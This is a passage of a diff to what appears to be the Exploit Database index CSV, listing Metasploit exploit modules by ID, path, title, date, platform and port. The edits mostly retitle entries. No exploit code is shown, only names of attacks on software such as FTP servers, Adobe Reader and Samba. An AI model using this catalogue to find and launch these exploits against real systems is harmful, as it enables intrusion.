Ultravox Streaming Metadata (in_mp3.dll) - Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16612,platforms/windows/remote/16612.rb,"Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution",2010-09-20,metasploit,windows,remote,0 16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use",2010-09-20,metasploit,windows,local,0 +16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)",2010-09-20,metasploit,windows,local,0 16615,platforms/windows/local/16615.rb,"Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption",2010-04-30,metasploit,windows,local,0 16616,platforms/windows/remote/16616.rb,"SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16617,platforms/windows/local/16617.rb,"VUPlayer - M3U Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 PLF Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16619,platforms/windows/local/16619.rb,"Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 +16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow",2010-11-11,metasploit,windows,local,0 +16619,platforms/windows/local/16619.rb,"Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow (2)",2010-09-25,metasploit,windows,local,0 16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow Exploit (SEH)",2011-01-08,metasploit,windows,local,0 16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0 -16622,platforms/windows/local/16622.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",2010-09-25,metasploit,windows,local,0 -16623,platforms/windows/local/16623.rb,"Adobe Doc.media.newPlayer Use After Free Vulnerability",2010-09-25,metasploit,windows,local,0 +16622,platforms/windows/local/16622.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun (2)",2010-09-25,metasploit,windows,local,0 +16623,platforms/windows/local/16623.rb,"Adobe Doc.media.newPlayer Use After Free Vulnerability (2)",2010-09-25,metasploit,windows,local,0 16624,platforms/windows/local/16624.rb,"Adobe util.printf() Buffer Overflow (2)",2010-09-25,metasploit,windows,local,0 16625,platforms/windows/local/16625.rb,"Microsoft Excel Malformed FEATHEADER Record Vulnerability",2010-09-25,metasploit,windows,local,0 -16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 (PLS File) Stack Buffer Overflow",2010-01-28,metasploit,windows,local,0 +16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - (PLS File) Stack Buffer Overflow",2010-01-28,metasploit,windows,local,0 16627,platforms/windows/local/16627.rb,"UltraISO CUE File Parsing Buffer Overflow",2010-04-30,metasploit,windows,local,0 16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow",2010-11-11,metasploit,windows,local,0 16629,platforms/windows/local/16629.rb,"VideoLAN VLC TiVo Buffer Overflow",2011-02-02,metasploit,windows,local,0 16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit",2010-09-25,metasploit,windows,local,0 -16632,platforms/windows/local/16632.rb,"ACDSee XPM File Section Buffer Overflow",2010-09-25,metasploit,windows,local,0 +16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (1)",2010-09-25,metasploit,windows,local,0 +16632,platforms/windows/local/16632.rb,"ACDSee - XPM File Section Buffer Overflow",2010-09-25,metasploit,windows,local,0 16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow",2010-11-11,metasploit,windows,local,0 16634,platforms/windows/local/16634.rb,"Free Download Manager Torrent Parsing Buffer Overflow",2010-09-25,metasploit,windows,local,0 16635,platforms/windows/remote/16635.rb,"activePDF WebGrabber ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 @@ -14438,27 +14434,27 @@ id,file,description,date,author,platform,type,port 16638,platforms/windows/remote/16638.rb,"DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow",2010-09-25,metasploit,windows,remote,0 16639,platforms/windows/remote/16639.rb,"McAfee Remediation Client ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16640,platforms/windows/local/16640.rb,"FeedDemon <= 3.1.0.12 - Stack Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16641,platforms/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 Get() method - Buffer Overflow",2010-09-25,metasploit,windows,remote,0 +16641,platforms/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow",2010-09-25,metasploit,windows,remote,0 16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow",2010-11-11,metasploit,windows,local,0 16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote GROUPNAME Buffer Overflow",2010-11-11,metasploit,windows,local,0 16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow",2010-04-05,metasploit,windows,local,0 16645,platforms/windows/local/16645.rb,"URSoft W32Dasm Disassembler Function Buffer Overflow",2010-09-25,metasploit,windows,local,0 16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow",2010-04-30,metasploit,windows,local,0 16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit",2010-09-25,metasploit,windows,local,0 +16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (2)",2010-09-25,metasploit,windows,local,0 16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit",2010-09-25,metasploit,windows,remote,0 -16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH)",2010-09-25,metasploit,windows,local,0 +16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH) (2)",2010-09-25,metasploit,windows,local,0 16651,platforms/windows/local/16651.rb,"AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16652,platforms/windows/local/16652.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow",2010-09-25,metasploit,windows,local,0 +16652,platforms/windows/local/16652.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,metasploit,windows,local,0 16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0 -16654,platforms/windows/local/16654.rb,"Orbital Viewer ORB File Parsing Buffer Overflow",2010-03-09,metasploit,windows,local,0 +16654,platforms/windows/local/16654.rb,"Orbital Viewer - ORB File Parsing Buffer Overflow",2010-03-09,metasploit,windows,local,0 16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer Buffer Overflow",2010-12-16,metasploit,windows,local,0 -16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration Buffer Overflow",2010-09-25,metasploit,aix,dos,0 +16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow",2010-09-25,metasploit,aix,dos,0 16658,platforms/windows/local/16658.rb,"VUPlayer - CUE Buffer Overflow",2010-11-11,metasploit,windows,local,0 16659,platforms/aix/local/16659.rb,"Cain & Abel <= 4.9.24 - RDP Buffer Overflow",2010-11-24,metasploit,aix,local,0 16660,platforms/windows/local/16660.rb,"Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow",2011-02-08,metasploit,windows,local,0 -16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 pls Buffer Overflow",2010-09-25,metasploit,windows,local,0 +16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - pls Buffer Overflow",2010-09-25,metasploit,windows,local,0 16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow",2010-11-11,metasploit,windows,local,0 16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player Buffer Overflow",2010-11-11,metasploit,windows,local,0 16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow Exploit",2010-09-25,metasploit,windows,local,0 @@ -14473,18 +14469,18 @@ id,file,description,date,author,platform,type,port 16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow",2010-11-11,metasploit,windows,local,0 16674,platforms/windows/local/16674.rb,"Adobe Collab.collectEmailInfo() Buffer Overflow",2010-09-25,metasploit,windows,local,0 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner (DBR File) Path Buffer Overflow",2010-09-20,metasploit,windows,local,0 -16676,platforms/windows/local/16676.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit",2011-01-08,metasploit,windows,local,0 +16676,platforms/windows/local/16676.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (2)",2011-01-08,metasploit,windows,local,0 16677,platforms/windows/local/16677.rb,"CA Antivirus Engine CAB Buffer Overflow",2010-11-11,metasploit,windows,local,0 16678,platforms/windows/local/16678.rb,"VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow",2010-09-20,metasploit,windows,local,0 16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow",2011-01-08,metasploit,windows,local,0 16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic VBP Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16681,platforms/windows/local/16681.rb,"Adobe Collab.getIcon() Buffer Overflow",2010-09-25,metasploit,windows,local,0 +16681,platforms/windows/local/16681.rb,"Adobe Collab.getIcon() Buffer Overflow (2)",2010-09-25,metasploit,windows,local,0 16682,platforms/windows/local/16682.rb,"Adobe PDF Escape EXE Social Engineering (No JavaScript)",2010-12-16,metasploit,windows,local,0 -16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit",2010-09-25,metasploit,windows,local,0 +16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (3)",2010-09-25,metasploit,windows,local,0 16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .M3U Buffer Overflow",2010-04-30,metasploit,windows,local,0 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback ActiveX Control Buffer Overflow",2010-11-05,metasploit,windows,remote,0 16686,platforms/windows/local/16686.rb,"Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,metasploit,windows,local,0 -16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use",2010-09-25,metasploit,windows,local,0 +16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (2)",2010-09-25,metasploit,windows,local,0 16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - (PLS File) Stack Buffer Overflow",2010-11-24,metasploit,windows,local,0 16689,platforms/windows/remote/16689.rb,"CCProxy <= 6.2 - Telnet Proxy Ping Overflow",2010-04-30,metasploit,windows,remote,23 16690,platforms/windows/remote/16690.rb,"Qbik WinGate WWW Proxy Server URL Processing Overflow",2010-09-20,metasploit,windows,remote,80 @@ -14498,9 +14494,9 @@ id,file,description,date,author,platform,type,port 16698,platforms/windows/remote/16698.rb,"Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,metasploit,windows,remote,0 16699,platforms/windows/remote/16699.rb,"Outlook ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,metasploit,windows,remote,0 16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution",2010-09-20,metasploit,windows,remote,0 -16701,platforms/windows/remote/16701.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,windows,remote,3306 +16701,platforms/windows/remote/16701.rb,"MySQL yaSSL - SSL Hello Message Buffer Overflow (Windows)",2010-05-09,metasploit,windows,remote,3306 16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.02 - USER Overflow",2010-04-30,metasploit,windows,remote,21 -16703,platforms/windows/remote/16703.rb,"GlobalSCAPE Secure FTP Server Input Overflow",2010-10-05,metasploit,windows,remote,0 +16703,platforms/windows/remote/16703.rb,"GlobalSCAPE Secure FTP Server - Input Overflow",2010-10-05,metasploit,windows,remote,0 16704,platforms/windows/remote/16704.rb,"LeapFTP 3.0.1 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 16705,platforms/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 16706,platforms/windows/remote/16706.rb,"War-FTPD 1.65 Password Overflow",2010-07-03,metasploit,windows,remote,0 @@ -14509,10 +14505,10 @@ id,file,description,date,author,platform,type,port 16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 Banner Remote Buffer Overflow Exploit",2010-07-03,metasploit,windows,remote,0 16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 PASV Remote Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16711,platforms/windows/remote/16711.rb,"EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow",2010-07-27,metasploit,windows,remote,0 -16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 Format String",2010-06-22,metasploit,windows,remote,21 +16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 - Format String",2010-06-22,metasploit,windows,remote,21 16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g - (MKD) Command Buffer Overflow",2011-02-23,metasploit,windows,remote,0 16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB FTP UNLOCK Overflow (Win32)",2010-10-05,metasploit,windows,remote,2100 -16715,platforms/windows/remote/16715.rb,"Serv-U FTPD MDTM Overflow",2010-09-20,metasploit,windows,remote,21 +16715,platforms/windows/remote/16715.rb,"Serv-U FTPD - MDTM Overflow",2010-09-20,metasploit,windows,remote,21 16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)",2010-11-14,metasploit,windows,remote,0 16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - XMD5 Overflow",2010-04-30,metasploit,windows,remote,0 16718,platforms/windows/remote/16718.rb,"Xlink FTP Server Buffer Overflow",2010-11-11,metasploit,windows,remote,0 @@ -14529,7 +14525,7 @@ id,file,description,date,author,platform,type,port 16729,platforms/windows/remote/16729.rb,"SlimFTPd LIST Concatenation Overflow",2010-10-05,metasploit,windows,remote,0 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Username Overflow",2010-09-20,metasploit,windows,remote,0 16731,platforms/win32/remote/16731.rb,"Oracle 9i XDB FTP PASS Overflow (Win32)",2010-04-30,metasploit,win32,remote,0 -16732,platforms/windows/remote/16732.rb,"HTTPDX tolog() Function Format String Vulnerability",2010-08-25,metasploit,windows,remote,0 +16732,platforms/windows/remote/16732.rb,"HTTPDX - tolog() Function Format String Vulnerability (1)",2010-08-25,metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version",2010-04-30,metasploit,windows,remote,21 16734,platforms/windows/remote/16734.rb,"EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow",2010-08-03,metasploit,windows,remote,0 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow",2010-10-05,metasploit,windows,remote,0 @@ -14539,7 +14535,7 @@ id,file,description,date,author,platform,type,port 16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit",2010-04-30,metasploit,windows,remote,21 16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server NLST Response Overflow",2010-11-12,metasploit,windows,remote,21 16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 SIZE Overflow",2010-06-22,metasploit,windows,remote,0 -16742,platforms/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 PASS Overflow",2010-05-09,metasploit,windows,remote,0 +16742,platforms/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow",2010-05-09,metasploit,windows,remote,0 16743,platforms/windows/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 16744,platforms/windows/remote/16744.rb,"Computer Associates License Client GETCONFIG Overflow",2010-09-20,metasploit,windows,remote,10203 16745,platforms/windows/remote/16745.rb,"Computer Associates License Server GETCONFIG Overflow",2010-09-20,metasploit,windows,remote,10202 @@ -14548,26 +14544,26 @@ id,file,description,date,author,platform,type,port 16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)",2010-07-25,metasploit,windows,remote,0 16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface Overflow",2011-01-11,metasploit,windows,remote,0 16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service DNS Name Path Overflow",2010-07-25,metasploit,windows,remote,0 -16751,platforms/win32/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 File Request Format String Overflow",2010-04-30,metasploit,win32,remote,0 -16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite LDAP protocol Buffer Overflow",2010-02-15,metasploit,windows,remote,80 +16751,platforms/win32/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow",2010-04-30,metasploit,win32,remote,0 +16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite - LDAP protocol Buffer Overflow",2010-02-15,metasploit,windows,remote,80 16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server If-Modified-Since Overflow",2010-08-25,metasploit,windows,remote,80 16754,platforms/windows/remote/16754.rb,"Minishare 1.4.1 - Buffer Overflow",2010-05-09,metasploit,windows,remote,80 16755,platforms/windows/remote/16755.rb,"Novell iManager - getMultiPartParameters Arbitrary File Upload",2010-10-19,metasploit,windows,remote,8080 16756,platforms/windows/remote/16756.rb,"Sambar 6 - Search Results Buffer Overflow",2010-02-13,metasploit,windows,remote,80 16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 Accept-Language Overflow",2010-09-20,metasploit,windows,remote,8300 16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 WebTools Buffer Overflow",2010-07-16,metasploit,windows,remote,9999 -16759,platforms/win32/remote/16759.rb,"SHTTPD <= 1.34 URI-Encoded POST Request Overflow (Win32)",2010-05-09,metasploit,win32,remote,0 +16759,platforms/win32/remote/16759.rb,"SHTTPD <= 1.34 - URI-Encoded POST Request Overflow (Win32)",2010-05-09,metasploit,win32,remote,0 16760,platforms/windows/remote/16760.rb,"Private Wire Gateway - Buffer Overflow",2010-04-30,metasploit,windows,remote,80 -16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 EXT.dll Buffer Overflow",2010-07-07,metasploit,windows,remote,80 +16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 - EXT.dll Buffer Overflow",2010-07-07,metasploit,windows,remote,80 16762,platforms/windows/remote/16762.rb,"BEA WebLogic JSESSIONID Cookie Value Overflow",2010-07-03,metasploit,windows,remote,80 16763,platforms/win32/remote/16763.rb,"Icecast <= 2.0.1 - Header Overwrite (Win32)",2010-04-30,metasploit,win32,remote,8000 -16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 +16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)",2010-05-09,metasploit,windows,remote,0 16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM Database Parameter Overflow",2010-09-20,metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,8080 16767,platforms/windows/remote/16767.rb,"IA WebMail 3.x - Buffer Overflow",2010-05-09,metasploit,windows,remote,80 16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan Remote Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow",2010-07-13,metasploit,windows,remote,8008 -16770,platforms/windows/shellcode/16770.rb,"Savant 3.1 Web Server Overflow",2010-10-04,metasploit,windows,shellcode,0 +16770,platforms/windows/shellcode/16770.rb,"Savant 3.1 Web Server - Overflow",2010-10-04,metasploit,windows,shellcode,0 16771,platforms/windows/remote/16771.rb,"EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow",2010-08-17,metasploit,windows,remote,8080 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server Authentication Request Handling Buffer Overflow",2010-08-06,metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server Host Header Overflow",2010-05-09,metasploit,windows,remote,8028 @@ -14581,7 +14577,7 @@ id,file,description,date,author,platform,type,port 16781,platforms/windows/remote/16781.rb,"MailEnable Authorization Header Buffer Overflow",2010-07-07,metasploit,windows,remote,0 16782,platforms/windows/remote/16782.rb,"Apache Win32 Chunked Encoding",2010-07-07,metasploit,windows,remote,0 16783,platforms/win32/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot Overflow",2010-09-20,metasploit,win32,remote,0 -16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management Remote Execution",2010-11-22,metasploit,multiple,remote,80 +16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,metasploit,multiple,remote,80 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration Buffer Overflow",2010-11-24,metasploit,windows,remote,80 16786,platforms/windows/remote/16786.rb,"PeerCast <= 0.1216 URL Handling Buffer Overflow (Win32)",2010-09-20,metasploit,windows,remote,7144 16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow",2010-07-14,metasploit,windows,remote,0 @@ -14591,8 +14587,8 @@ id,file,description,date,author,platform,type,port 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM GET Buffer Overflow",2010-05-09,metasploit,windows,remote,9999 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs webquery.dll Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,80 -16794,platforms/windows/remote/16794.rb,"HTTPDX tolog() Function Format String Vulnerability",2010-08-25,metasploit,windows,remote,80 -16795,platforms/cgi/webapps/16795.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow",2010-05-09,metasploit,cgi,webapps,0 +16794,platforms/windows/remote/16794.rb,"HTTPDX - tolog() Function Format String Vulnerability (2)",2010-08-25,metasploit,windows,remote,80 +16795,platforms/cgi/webapps/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow",2010-05-09,metasploit,cgi,webapps,0 16796,platforms/windows/remote/16796.rb,"BEA Weblogic Transfer-Encoding Buffer Overflow",2010-07-08,metasploit,windows,remote,80 16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16798,platforms/windows/remote/16798.rb,"Apache mod_jk 1.2.20 - Buffer Overflow",2010-07-25,metasploit,windows,remote,0 @@ -14631,22 +14627,22 @@ id,file,description,date,author,platform,type,port 16831,platforms/windows/remote/16831.rb,"SafeNet SoftRemote IKE Service Buffer Overflow",2010-06-22,metasploit,windows,remote,62514 16832,platforms/netware/remote/16832.rb,"Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow",2010-05-09,metasploit,netware,remote,0 16833,platforms/netware/remote/16833.rb,"NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow",2010-11-14,metasploit,netware,remote,111 -16834,platforms/linux/remote/16834.rb,"Snort Back Orifice Pre-Preprocessor Remote Exploit",2010-07-03,metasploit,linux,remote,0 +16834,platforms/linux/remote/16834.rb,"Snort Back Orifice - Pre-Preprocessor Remote Exploit",2010-07-03,metasploit,linux,remote,0 16835,platforms/linux/remote/16835.rb,"Madwifi SIOCGIWSCAN Buffer Overflow",2010-09-20,metasploit,linux,remote,0 16836,platforms/linux/remote/16836.rb,"Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow",2010-04-30,metasploit,linux,remote,0 16837,platforms/linux/remote/16837.rb,"hplip hpssd.py From Address Arbitrary Command Execution",2010-10-09,metasploit,linux,remote,0 -16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent Remote Buffer Overflow",2011-03-03,metasploit,linux,remote,0 +16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (2)",2011-03-03,metasploit,linux,remote,0 16839,platforms/linux/remote/16839.rb,"Borland InterBase PWD_db_aliased() Buffer Overflow",2010-07-03,metasploit,linux,remote,0 16840,platforms/linux/remote/16840.rb,"Borland InterBase open_marker_file() Buffer Overflow",2010-07-03,metasploit,linux,remote,0 16841,platforms/linux/remote/16841.rb,"GLD (Greylisting Daemon) Postfix Buffer Overflow",2010-07-03,metasploit,linux,remote,0 -16842,platforms/linux/remote/16842.rb,"LPRng use_syslog Remote Format String Vulnerability",2010-07-03,metasploit,linux,remote,0 +16842,platforms/linux/remote/16842.rb,"LPRng - use_syslog Remote Format String Vulnerability",2010-07-03,metasploit,linux,remote,0 16843,platforms/linux/remote/16843.rb,"Borland InterBase jrd8_create_database() Buffer Overflow",2010-07-03,metasploit,linux,remote,0 16844,platforms/linux/remote/16844.rb,"Borland InterBase INET_connect() Buffer Overflow",2010-07-03,metasploit,linux,remote,0 -16845,platforms/linux/remote/16845.rb,"Poptop Negative Read Overflow",2010-11-23,metasploit,linux,remote,0 +16845,platforms/linux/remote/16845.rb,"Poptop - Negative Read Overflow",2010-11-23,metasploit,linux,remote,0 16846,platforms/linux/remote/16846.rb,"UoW IMAP server LSUB Buffer Overflow",2010-03-26,metasploit,linux,remote,0 16847,platforms/linux/remote/16847.rb,"Squid NTLM Authenticate Overflow",2010-04-30,metasploit,linux,remote,0 16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 - 'secure' Overflow (Linux)",2010-09-20,metasploit,linux,remote,0 -16849,platforms/linux/remote/16849.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,linux,remote,0 +16849,platforms/linux/remote/16849.rb,"MySQL yaSSL - SSL Hello Message Buffer Overflow (Linux)",2010-05-09,metasploit,linux,remote,0 16850,platforms/linux/remote/16850.rb,"MySQL yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,metasploit,linux,remote,0 16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 - 1.3.3b - Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0 16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0 @@ -14656,26 +14652,26 @@ id,file,description,date,author,platform,type,port 16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTP Daemon Arbitrary Command Execution",2010-07-07,metasploit,cgi,webapps,0 16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",2010-10-05,metasploit,cgi,webapps,0 16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package passwd.php3 - Arbitrary Command Execution",2010-10-18,metasploit,php,webapps,0 -16859,platforms/linux/remote/16859.rb,"Samba lsa_io_trans_names Heap Overflow",2010-07-14,metasploit,linux,remote,0 +16859,platforms/linux/remote/16859.rb,"Samba lsa_io_trans_names Heap Overflow (Linux)",2010-07-14,metasploit,linux,remote,0 16860,platforms/linux/remote/16860.rb,"Samba chain_reply Memory Corruption (Linux x86)",2010-09-04,metasploit,linux,remote,0 -16861,platforms/linux/remote/16861.rb,"Samba trans2open Overflow (Linux x86)",2010-07-14,metasploit,linux,remote,0 -16862,platforms/hardware/remote/16862.rb,"iPhone MobileSafari LibTIFF Buffer Overflow",2010-09-20,metasploit,hardware,remote,0 +16861,platforms/linux/remote/16861.rb,"Samba - trans2open Overflow (Linux x86)",2010-07-14,metasploit,linux,remote,0 +16862,platforms/hardware/remote/16862.rb,"iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)",2010-09-20,metasploit,hardware,remote,0 16863,platforms/osx/remote/16863.rb,"AppleFileServer LoginExt PathName Overflow",2010-09-20,metasploit,osx,remote,0 -16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion 